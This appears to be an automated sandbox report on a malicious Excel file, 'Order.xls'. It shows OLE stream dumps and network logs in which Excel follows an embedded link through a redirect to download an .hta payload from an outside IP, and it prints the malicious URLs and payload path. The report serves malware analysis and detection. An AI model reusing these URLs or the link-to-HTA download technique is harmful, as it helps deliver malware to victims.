                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 1
                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 44 01 00 00 10 00 00 00 01 00 00 00 88 00 00 00 02 00 00 00 90 00 00 00 03 00 00 00 9c 00 00 00 04 00 00 00 a8 00 00 00 05 00 00 00 b8 00 00 00 06 00 00 00 c4 00 00 00 07 00 00 00 d0 00 00 00 08 00 00 00 dc 00 00 00 09 00 00 00 ec 00 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD000846C9/Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:97808
                            Entropy:7.365095307579232
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                            General
                            Stream Path:MBD0047BAAA/MBD0018D4CE/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:20
                            Entropy:0.5689955935892812
                            Base64 Encoded:False
                            Data ASCII:. . . . . . . . . . . . . . . . . . . .
                            Data Raw:01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/MBD0018D4CE/\x3ObjInfo
                            CLSID:
                            File Type:data
                            Stream Size:4
                            Entropy:0.8112781244591328
                            Base64 Encoded:False
                            Data ASCII:. . . .
                            Data Raw:00 00 03 00
                            General
                            Stream Path:MBD0047BAAA/MBD0018D4CE/Contents
                            CLSID:
                            File Type:Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
                            Stream Size:197671
                            Entropy:6.989042939766534
                            Base64 Encoded:True
                            Data ASCII:C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                            Data Raw:43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            General
                            Stream Path:MBD0047BAAA/Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:386813
                            Entropy:7.815032759709734
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                            General
                            Stream Path:MBD0047BAAB/\x1Ole
                            CLSID:
                            File Type:data
                            Stream Size:900
                            Entropy:5.54610081536176
                            Base64 Encoded:False
                            Data ASCII:. . . . _ . . H . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . Z . l . C . P . R . 2 . 7 . v . ? . & . i . m . p . r . e . s . s . = . v . e . r . d . a . n . t . & . g . o . w . n . = . s . i . n . c . e . r . e . & . l . i . g . h . t . n . i . n . g . = . f . r . e . t . f . u . l . & . w . i . n . d . o . w . . . . ~ . 9 . [ P x q . W . . l > . R Q t . z . . . . F } - i i . k [ * h p y 1 , . . , { 6 X ` + . . | g L [
                            Data Raw:01 00 00 02 8b fb 5f 10 d0 17 e0 48 00 00 00 00 00 00 00 00 00 00 00 00 94 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 90 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 5a 00 6c 00 43 00 50 00 52 00 32 00 37 00 76 00 3f 00 26 00 69 00 6d 00 70 00 72 00 65 00 73 00 73 00 3d 00 76 00
                            General
                            Stream Path:Workbook
                            CLSID:
                            File Type:Applesoft BASIC program data, first line number 16
                            Stream Size:434951
                            Entropy:7.999157902747442
                            Base64 Encoded:True
                            Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . V - . G L % N { { ` m . k 1 . . . / B . V m . . . . D . . . . . . . # . . . \\ . p . . Y n N ` g m = . A ? . + P W j U F & X P J . . 7 J ! w 5 . " . . r a P . p h . + 9 A @ . a = L . . . . l 5 Q { . B . . . ( a . . . . . . = . . . * . . . . ? . . z s . . . m . . . U . . . . = . . . . . S . . . . . . . . . . . . = . . . K > + Y * x " y $ l z @ . . . . . . h " . . . u { . . . . . . . _ . . . \\ ! 1 . . . a . b . k . 7 . . + & V . 6 ( . 1 . . . - ~ . n 7
                            Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 56 83 2d f8 0c a8 47 fe 89 4c 25 dd 4e 7b 87 7b b5 60 9e fc 6d 2e 6b ec f3 31 10 19 04 2f 42 16 56 84 6d 94 0b 9a 1e da 93 92 cc 83 bd 44 cf df e1 00 02 00 b0 04 c1 00 02 00 9b 23 e2 00 00 00 5c 00 70 00 1f f1 83 ad e3 59 d7 dd 6e eb ec 4e 9f af 8d 88 60 67 6d 3d 05 c8 41 3f dd 01 2b ae 50 57
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECT
                            CLSID:
                            File Type:ASCII text, with CRLF line terminators
                            Stream Size:525
                            Entropy:5.255600665562837
                            Base64 Encoded:True
                            Data ASCII:I D = " { 2 5 5 B B 7 4 9 - F 4 B 4 - 4 F 6 4 - A 0 7 2 - 7 7 D A F 2 0 9 6 F 5 A } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C 0 C 2 2 4 A 2 2 8 A 2 2 8 A 2 2
                            Data Raw:49 44 3d 22 7b 32 35 35 42 42 37 34 39 2d 46 34 42 34 2d 34 46 36 34 2d 41 30 37 32 2d 37 37 44 41 46 32 30 39 36 46 35 41 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                            General
                            Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                            CLSID:
                            File Type:data
                            Stream Size:104
                            Entropy:3.0488640812019017
                            Base64 Encoded:False
                            Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                            Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                            CLSID:
                            File Type:data
                            Stream Size:2644
                            Entropy:3.9912701996037145
                            Base64 Encoded:False
                            Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                            Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                            General
                            Stream Path:_VBA_PROJECT_CUR/VBA/dir
                            CLSID:
                            File Type:data
                            Stream Size:553
                            Entropy:6.361734017566669
                            Base64 Encoded:True
                            Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                            Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 d8 c0 99 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 15, 2025 18:25:16.472079039 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:16.472130060 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:16.472290039 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:16.473433971 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:16.473459005 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:29.483387947 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:29.483560085 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:29.487929106 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:29.487943888 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:29.489526987 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:29.489656925 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:29.493969917 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:29.494074106 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:29.494178057 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:29.494187117 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:29.494345903 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:29.497685909 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:29.539326906 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:30.061423063 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.061467886 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.061651945 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.061929941 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.061939955 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.664436102 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:30.664558887 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:30.664581060 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:30.664622068 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:30.664644957 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:30.664673090 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:30.668627024 CET49707443192.168.2.2714.103.79.10
                            Jan 15, 2025 18:25:30.668644905 CET4434970714.103.79.10192.168.2.27
                            Jan 15, 2025 18:25:30.670440912 CET4970980192.168.2.27172.245.119.74
                            Jan 15, 2025 18:25:30.791553974 CET8049709172.245.119.74192.168.2.27
                            Jan 15, 2025 18:25:30.791706085 CET4970980192.168.2.27172.245.119.74
                            Jan 15, 2025 18:25:30.791883945 CET4970980192.168.2.27172.245.119.74
                            Jan 15, 2025 18:25:30.818005085 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.818341970 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.821434975 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.821441889 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.821840048 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.822917938 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.840074062 CET8049709172.245.119.74192.168.2.27
                            Jan 15, 2025 18:25:30.867333889 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.954830885 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.954999924 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.955132008 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.955339909 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.955339909 CET49708443192.168.2.2713.107.246.45
                            Jan 15, 2025 18:25:30.955353975 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:30.955363989 CET4434970813.107.246.45192.168.2.27
                            Jan 15, 2025 18:25:32.197313070 CET8049709172.245.119.74192.168.2.27
                            Jan 15, 2025 18:25:32.197405100 CET4970980192.168.2.27172.245.119.74
                            Jan 15, 2025 18:25:32.197503090 CET4970980192.168.2.27172.245.119.74
                            Jan 15, 2025 18:25:32.202338934 CET8049709172.245.119.74192.168.2.27
                            TimestampSource PortDest PortSource IPDest IP
                            Jan 15, 2025 18:25:16.071341991 CET5342153192.168.2.271.1.1.1
                            Jan 15, 2025 18:25:16.470984936 CET53534211.1.1.1192.168.2.27
                            Jan 15, 2025 18:25:30.052831888 CET5342153192.168.2.271.1.1.1
                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            Jan 15, 2025 18:25:16.071341991 CET192.168.2.271.1.1.10xe3d3Standard query (0)s.deemos.comA (IP address)IN (0x0001)false
                            Jan 15, 2025 18:25:30.052831888 CET192.168.2.271.1.1.10x2abbStandard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                            Jan 15, 2025 18:25:16.470984936 CET1.1.1.1192.168.2.270xe3d3No error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                            Jan 15, 2025 18:25:30.060787916 CET1.1.1.1192.168.2.270x2abbNo error (0)otelrules.svc.static.microsoftotelrules.azureedge.netCNAME (Canonical name)IN (0x0001)false
                            Jan 15, 2025 18:25:30.060787916 CET1.1.1.1192.168.2.270x2abbNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                            Jan 15, 2025 18:25:30.060787916 CET1.1.1.1192.168.2.270x2abbNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                            • s.deemos.com
                            • otelrules.svc.static.microsoft
                            • 172.245.119.74
                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.2749709172.245.119.74808464C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            Jan 15, 2025 18:25:30.791883945 CET278OUTGET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Connection: Keep-Alive
                            Host: 172.245.119.74


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            0192.168.2.274970714.103.79.104438464C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:25:29 UTC273OUTGET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1
                            Accept: */*
                            UA-CPU: AMD64
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                            Host: s.deemos.com
                            Connection: Keep-Alive
                            2025-01-15 17:25:30 UTC470INHTTP/1.1 302 Found
                            Date: Wed, 15 Jan 2025 17:25:30 GMT
                            Content-Type: text/plain; charset=utf-8
                            Content-Length: 110
                            Connection: close
                            X-DNS-Prefetch-Control: off
                            X-Frame-Options: SAMEORIGIN
                            Strict-Transport-Security: max-age=15724800; includeSubDomains
                            X-Download-Options: noopen
                            X-Content-Type-Options: nosniff
                            X-XSS-Protection: 1; mode=block
                            Location: http://172.245.119.74/xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta
                            Vary: Accept
                            2025-01-15 17:25:30 UTC110INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 37 32 2e 32 34 35 2e 31 31 39 2e 37 34 2f 78 61 6d 70 70 2f 73 6e 73 2f 63 72 65 61 74 65 64 62 65 73 74 74 68 69 6e 67 73 66 6f 72 68 61 70 70 69 6e 65 73 73 77 69 74 68 6f 75 74 6d 65 67 69 76 65 6e 79 6f 75 66 6f 72 68 65 72 2e 68 74 61
                            Data Ascii: Found. Redirecting to http://172.245.119.74/xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            1192.168.2.274970813.107.246.454438464C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            TimestampBytes transferredDirectionData
                            2025-01-15 17:25:30 UTC214OUTGET /rules/rule170146v0s19.xml HTTP/1.1
                            Connection: Keep-Alive
                            Accept-Encoding: gzip
                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.18129; Pro)
                            Host: otelrules.svc.static.microsoft
                            2025-01-15 17:25:30 UTC498INHTTP/1.1 200 OK
                            Date: Wed, 15 Jan 2025 17:25:30 GMT
                            Content-Type: text/xml
                            Content-Length: 461
                            Connection: close
                            Cache-Control: public, max-age=604800, immutable
                            Last-Modified: Thu, 14 Nov 2024 16:14:57 GMT
                            ETag: "0x8DD04C77BDE7614"
                            x-ms-request-id: a5c473cf-501e-0078-4969-6706cf000000
                            x-ms-version: 2018-03-28
                            x-azure-ref: 20250115T172530Z-15fdc555dffblbhghC1EWR9d3n00000001pg000000006qhf
                            x-fd-int-roxy-purgeid: 0
                            X-Cache-Info: L2_T2
                            X-Cache: TCP_REMOTE_HIT
                            Accept-Ranges: bytes
                            2025-01-15 17:25:30 UTC461INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 37 30 31 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 47 72 61 70 68 69 63 73 2e 45 78 70 6f 72 74 42 75 6c 6c 65 74 42 6c 69 70 43 45 78 63 65 70 74 69 6f 6e 22 20 41 54 54 3d 22 63 66 63 66 64 62 39 31 63 36 38 63 34 33 32 39 62 62 38 62 37 63 62 37 62 61 62 62 33 63 66 37 2d 65 30 38 32 63 32 66 32 2d 65 66 31 64 2d 34 32 37 61 2d 61 63 34 64 2d 62 30 62 37 30 30 61 66 65 37 61 37 2d 37 36 35 35 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 34 38 39 66 34 22 20
                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="170146" V="0" DC="SM" EN="Office.Graphics.ExportBulletBlipCException" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="489f4"


                            Click to jump to process

                            Click to jump to process

                            Click to dive into process behavior distribution

                            Click to jump to process

                            Target ID:0
                            Start time:12:24:22
                            Start date:15/01/2025
                            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                            Imagebase:0x7ff663f50000
                            File size:70'082'712 bytes
                            MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:false

                            Target ID:7
                            Start time:12:25:31
                            Start date:15/01/2025
                            Path:C:\Windows\splwow64.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\splwow64.exe 12288
                            Imagebase:0x7ff6bac40000
                            File size:192'512 bytes
                            MD5 hash:4C1F48431A4C5DE7841216C32CD98C46
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:false

                            Target ID:10
                            Start time:12:25:57
                            Start date:15/01/2025
                            Path:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order.xls"
                            Imagebase:0x7ff663f50000
                            File size:70'082'712 bytes
                            MD5 hash:F9F7B6C42211B06E7AC3E4B60AA8FB77
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Call Graph

                            • Entrypoint
                            • Decryption Function
                            • Executed
                            • Not Executed
                            • Show Help
                            callgraph 1 Error: Graph is empty

                            Module: Sheet1

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet1"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: Sheet2

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet2"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: Sheet3

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "Sheet3"

                            2

                            Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Module: ThisWorkbook

                            Declaration
                            LineContent
                            1

                            Attribute VB_Name = "ThisWorkbook"

                            2

                            Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                            3

                            Attribute VB_GlobalNameSpace = False

                            4

                            Attribute VB_Creatable = False

                            5

                            Attribute VB_PredeclaredId = True

                            6

                            Attribute VB_Exposed = True

                            7

                            Attribute VB_TemplateDerived = False

                            8

                            Attribute VB_Customizable = True

                            Reset < >